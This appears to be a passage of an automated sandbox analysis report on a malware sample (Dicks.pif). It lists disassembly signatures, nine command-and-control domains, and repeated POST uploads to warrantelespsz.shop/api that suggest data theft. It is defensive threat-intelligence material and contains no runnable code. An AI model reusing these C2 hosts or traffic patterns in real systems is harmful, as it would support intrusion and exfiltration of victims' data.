Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esi+30h]	23_2_00E76B30
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov byte ptr [ecx], al	23_2_00E76B30
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov byte ptr [ecx], al	23_2_00E76B30
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then jmp ecx	23_2_00E96EC6
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ecx, dword ptr [esi]	23_2_00E6EFD0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov byte ptr [ecx], bl	23_2_00E6EFD0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esi+18h]	23_2_00E871C9
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then inc ebx	23_2_00E753E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ecx, dword ptr [esp]	23_2_00E973E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov word ptr [eax], cx	23_2_00E773F2
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then movzx ebx, word ptr [ebp+eax*4+00h]	23_2_00E68380
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then jmp ecx	23_2_00E824D3
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp]	23_2_00E70497
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp+18h]	23_2_00E995DA
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ebx, eax	23_2_00E635B0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp+18h]	23_2_00E994D5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then jmp ecx	23_2_00E736A6
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp+04h]	23_2_00E9B660
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then movzx ebx, byte ptr [edx]	23_2_00E90600
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	23_2_00E997FB
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then inc edi	23_2_00E717FC
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp+18h]	23_2_00E727DB
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp]	23_2_00E727DB
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	23_2_00E63760
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esi+18h]	23_2_00E87741
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	23_2_00E95730
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov byte ptr [edi], al	23_2_00E86894
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp]	23_2_00E70832
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then jmp eax	23_2_00E989C0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov esi, eax	23_2_00E7FB65
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	23_2_00E84CB0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	23_2_00E6DC60
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then movzx ebx, dx	23_2_00E855E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esi+18h]	23_2_00E855E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then cmp byte ptr [eax+edi+01h], 00000000h	23_2_00E70D8E
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	23_2_00E74D94
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then or ebp, 40h	23_2_00E61D24
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then cmp dword ptr [eax+esi*8], 11081610h	23_2_00E80D10
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	23_2_00E82E84
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	23_2_00E7BFA0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ecx, dword ptr [esp+00000890h]	23_2_00E7EF2B
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp+04h]	23_2_00E9BF30

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: warrantelespsz.shop

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warrantelespsz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: warrantelespsz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: warrantelespsz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: warrantelespsz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: warrantelespsz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1242Host: warrantelespsz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572261Host: warrantelespsz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: warrantelespsz.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_000A29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

19_2_000A29BA

Source: global traffic	DNS traffic detected: DNS query: fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPh
Source: global traffic	DNS traffic detected: DNS query: warrantelespsz.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warrantelespsz.shop

Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSI53B9.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SymposiumTaiwan.exe, 00000008.00000000.2491029205.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe, 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe.4.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Dicks.pif, 00000013.00000000.2532080897.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000002.3265460967.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Notify.8.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.sho8
Source: Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/
Source: Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/N
Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179989281.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/api
Source: Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/api7N/
Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/apiBNz
Source: Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/apiOR
Source: Dicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/fe
Source: Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/ob
Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234579909.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/pi
Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/pid
Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/pim
Source: Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop/ta
Source: Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop:443/api
Source: Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop:443/api0-
Source: Dicks.pif, 00000017.00000003.3182124941.000000000341A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warrantelespsz.shop:443/apiMicrosoft
Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Feeling.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Dicks.pif, 00000017.00000003.3181573889.000000000343C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: Dicks.pif, 00000017.00000003.3181573889.000000000343C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
